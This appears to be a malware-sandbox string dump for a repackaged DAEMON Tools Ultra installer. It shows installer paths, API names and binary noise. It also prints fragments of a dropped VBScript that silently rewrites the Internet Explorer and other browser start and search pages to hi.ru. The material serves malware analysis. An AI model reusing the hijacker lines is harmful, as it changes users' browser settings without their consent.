Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bKYaaQqIqII^^(/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

boost::thread_resource_error

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

bs}!0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

C'6N!)XtJn0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

c(Y?!?wgF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

c,.X}K

Ansi based on Dropped File (imgengine.dll.62529018)

C:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra

Unicode based on Runtime Data (DiscSoftBusService.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe

Unicode based on Runtime Data (DiscSoftBusService.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra\DTUltra.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\DTUltra.exe,0

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\Uninstall.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%TEMP%\

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\HiRu

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%TEMP%\nscF0E4.tmp

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%TEMP%\nsrD151.tmp

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\nsrD151.tmp\nsDialogs.dll

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\HiRu\ChangeStartPage.exe

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%WINDIR%\system32\apphelp.dll

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%WINDIR%\SYSTEM\MSVBVM60.DLL\3

Ansi based on Dropped File (JSSys3.dll.204366558)

CatalogFile = dtultrascsibus.cat

Ansi based on Dropped File (SET4F37.tmp)

CfCE{]5Up

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cGetProcessList

Ansi based on Dropped File (JSSys3.dll.204366558)

Change computer name.

Ansi based on Dropped File (JSSys3.dll.204366558)

ChangeStartPage.exe

Unicode based on Runtime Data (HiRu.exe )

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}

Ansi based on Dropped File (SET4F37.tmp)

COMCTL32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

COMDLG32.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

comdlg32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

command

Unicode based on Runtime Data (DiscSoftBusService.exe )

CommandLineToArgvW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

CommDlgExtendedError

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Company name of PE file producer.

Ansi based on Dropped File (JSSys3.dll.204366558)

Const HKEY_LOCAL_MACHINE = &H80000002

Ansi based on Dropped File (start72urez3kr.vbs)

Const strHomePage = "http://hi.ru/?10"

Ansi based on Dropped File (start72urez3kr.vbs)

Const strSearch = "http://hi.ru/search/?q={searchTerms}"

Ansi based on Dropped File (start72urez3kr.vbs)

Control Panel\Desktop\ResourceLocale

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cP$k/%$/{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Cx."\X>!S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cyD8~[5ip<{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d%LrE)?Om[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D*hRa$)5[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D:>>::Z:RZYKTYPN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D>>>::>::ZZYRTKM\VW^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D>>>:>>Z:rrRY[T\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D>>>>>>::Z:ZZYNM\QW^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Daemon Tools Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DAEMON.Tools.Ultra

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ddb.geometry.cylinders

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.geometry.heads

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.geometry.sectors

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.virtualHWVersion

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Delete a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete a Registry key.4

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete a Registry value.

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete an ADS file.WW(

Ansi based on Dropped File (JSSys3.dll.204366558)

DisableLocalOverride

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisableUnsupportedCriticalExtensions

Unicode based on Runtime Data (dtinst.exe )

DiscSoftBusService.exe

Unicode based on Runtime Data (nsF6AA.tmp )

DllGetVersion

Unicode based on Dropped File (JSSys3.dll.204366558)

DomIcI)%@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DriverVer=12/08/2014,5.24.0.0

Ansi based on Dropped File (SET4F37.tmp)

DTAgent.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

dtinst.exe

Unicode based on Runtime Data (DiscSoftBusService.exe )

dtsoftbus01.inf

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DTUltra.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

dtultrascsibus.cat

Unicode based on Runtime Data (dtinst.exe )

dtultrascsibus.inf

Unicode based on Runtime Data (dtinst.exe )

dtusb.inf

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

d}hYI}h/k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E!<E(* 6d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E:\Projects\dtpro\service\vdrive\_dtinstall\Release\dtinst32.pdb

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

e@'EBb{;{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E[;)#uPTu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ease wait while Setup is loading...

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EFAULT\Control Panel\International

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

eKfl{1:0"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ek{W*::Dd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

emFY${O{nk/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EnumSystemLocalesEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

eq]IB-.g\V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Error launching installer

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Error writing temporary file. Make sure your temp folder is valid.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ers\43VNeoC\AppData\Local\Temp\nsrD151.tmp\nsDialogs.dll

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Ew6_=}"?D|s}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E{g[;t=(W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f/@8kbH+#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

F9CJP6L[!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Files(*.

Unicode based on Dropped File (JSSys3.dll.204366558)

Files(*.txt)

Unicode based on Dropped File (JSSys3.dll.204366558)

FileTimeToLocalFileTime

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given CLSID is registered.

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given CLSID is registered.WWW(

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given ProgID is registered.

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given ProgID is registered.WW&

Ansi based on Dropped File (JSSys3.dll.204366558)

For Each strSection In Split(objINIEdit.GetIniSectionNames(strProfilesFileName), vbNullChar)

Ansi based on Dropped File (start72urez3kr.vbs)

FSWlq><2.[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Fu<t|K#:Baa.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FVN@`=vt)s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FYZ`0h)C`[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f{C[3~s}6c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g)8fy[I5z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g1n+V9]}m:T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

G1UHA]C}$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Get colors in use for GUI items.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get colors in use for GUI items.WW>

Ansi based on Dropped File (JSSys3.dll.204366558)

Get computer name.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get current user name.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get display bits per pixel .

Ansi based on Dropped File (JSSys3.dll.204366558)

Get display bits per pixel .WW'

Ansi based on Dropped File (JSSys3.dll.204366558)

get file info.

Unicode based on Dropped File (JSSys3.dll.204366558)

Get full path of installed program EXE.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get full path of installed program EXE.WWW>

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of key=value pairs for one INI section.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of key=value pairs for one INI section.WW@

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of keynames in one INI section.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of keynames in one INI section.WW#

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one Registry value - Str, Dword, Binary or XStr.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one Registry value - Str, Dword, Binary or XStr.WW^

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one value from INI file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one value from INI file.WW(

Ansi based on Dropped File (JSSys3.dll.204366558)

Get RAM installed and RAM currently in use.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get screen width and height.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get screen width and height.WW)

Ansi based on Dropped File (JSSys3.dll.204366558)

Get size and free space info. for drives.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of active window.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of all open, visible windows.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of all open, visible windows.WW$

Ansi based on Dropped File (JSSys3.dll.204366558)

Get version and build of OS.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get version and build of OS.WW+

Ansi based on Dropped File (JSSys3.dll.204366558)

Get width and height of Desk work area.

Ansi based on Dropped File (JSSys3.dll.204366558)

GetClassInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetClassInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetCommandLineA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetCommandLineW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetCompName

Ansi based on Dropped File (JSSys3.dll.204366558)

GetComputerNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetCPInfo

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetCurrentProcessId

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetCurrentProcessorNumber

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetDriveInfo

Ansi based on Dropped File (JSSys3.dll.204366558)

GetEXEPath

Ansi based on Dropped File (JSSys3.dll.204366558)

GetExitCodeProcess

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileInformationByHandleExW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetFileVersionInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFileVersionInfoSizeA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFileVersionInfoSizeW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileVersionInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetForegroundWindow

Ansi based on Dropped File (JSSys3.dll.204366558)

GetIniSectionKeys

Ansi based on Dropped File (JSSys3.dll.204366558)

GetLastError

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetLocaleInfoEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetLogicalProcessorInformation

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetOpVersion

Ansi based on Dropped File (JSSys3.dll.204366558)

GetProcAddress

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetProcessHeap

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetProcessList

Ansi based on Dropped File (JSSys3.dll.204366558)

GetProcessWindowStation

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetRegFromCLSID

Ansi based on Dropped File (JSSys3.dll.204366558)

GetRegFromProgID

Ansi based on Dropped File (JSSys3.dll.204366558)

GetStartupInfoW

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GetTextCBWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

GetUserDefaultLocaleName

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetUserObjectInformationW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetVersion

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetVersionExA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetVersionExW

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GetVolumeInformationA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetWindowThreadProcessId

Ansi based on Dropped File (JSSys3.dll.204366558)

Gzs}\*:3Av>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H19Pd&{@%9B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h2}OuJ\xm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H=R2#t}A/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H>:t8\/lRq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H@VkDC|{D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HH:mm:ss

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

hhjdVbdPPPOOOM\]]]_G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HiRu.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HJ[["p,7R]y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HKCU{Software{Classes

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

HKR,,Security,,"D:P(A;;GA;;;SY)(A;;GA;;;BA)" ; Allow generic-all access to Local system and Built-in administrators

Ansi based on Dropped File (SET4F37.tmp)

hV|[@g)1mM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hz[%s/."

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

i'^K:x+A:eit

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I-n0S@@`U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I8Pdc{j\B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I;!$8"J}|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I`7a{n)KOfJw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IDSAsyncReportLunsResultHandler

Unicode based on Runtime Data (DiscSoftBusService.exe )

ient.Utils.ListViewLayoutManager.ListViewLayoutManager

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

if lcase(gWShell.Environment("SYSTEM")("Processor_Architecture")) = "amd64" Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objFSO.FileExists(strPrefsPath) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objFSO.FileExists(strProfilesFileName) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objINIEdit.GetIniVal(strProfilesFileName, strSection, "Default") = "1" Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objINIEdit.WriteIniVal(strPrefsPath, "User Prefs", "Home URL", strHomePage) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objRegExp_HomePage.Test(strContent) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.GetStringValue(HKEY_LOCAL_MACHINE, "SOFTWARE\Mozilla\Mozilla Firefox", "CurrentVersion", strCurrentVersion) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Search Page", strSearch) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Start Page", strHomePage) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

iqn.2006-01.com.disc-soft:daemon-tools:%ws-%ws

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_co.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_pdu.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_task.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

IsValidLocaleName

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

it1h)$C\c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J!QUG]\UG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j/@_6?YV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j0[~) |[#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jaoXPP\POQOL]_Z_s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jC m(rH!F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jddXPPWPOMMKKY]]]r

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jj/{Fz7\R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jp[Sqs:JQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jyg":>;}O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k&T//g-uH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K&yiMp.!L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k(A+[D{fd[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k8In/[Q0%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K[='c]pI(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Kcn}p.pW!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kX@}7@ ^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l.?E(:lXn

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l/VcJ)9Fq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l:ow@$m?Xi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l_f\7?\JD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lddFB@F@H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

les(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

List all section names in INI file.WWW0

Ansi based on Dropped File (JSSys3.dll.204366558)

List all subkeys in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List data of all string values in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List values in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List values in a Registry key.1

Ansi based on Dropped File (JSSys3.dll.204366558)

LoadOrderGroup = SCSI Miniport

Ansi based on Dropped File (SET4F37.tmp)

Local

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Local AppData

Unicode based on Runtime Data (dtinst.exe )

LocalAlloc

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Locale

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LocalFree

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

LocalizedName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LocalRedirectOnly

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LocalService

Unicode based on Runtime Data (DiscSoftBusService.exe )

LWf/f.t"B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l}H/JGX$\?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M"_?{*}0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m"rc)!ZM6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M/\B:{26:-`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m22O@k%l]d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M9W\[+Y9HJ

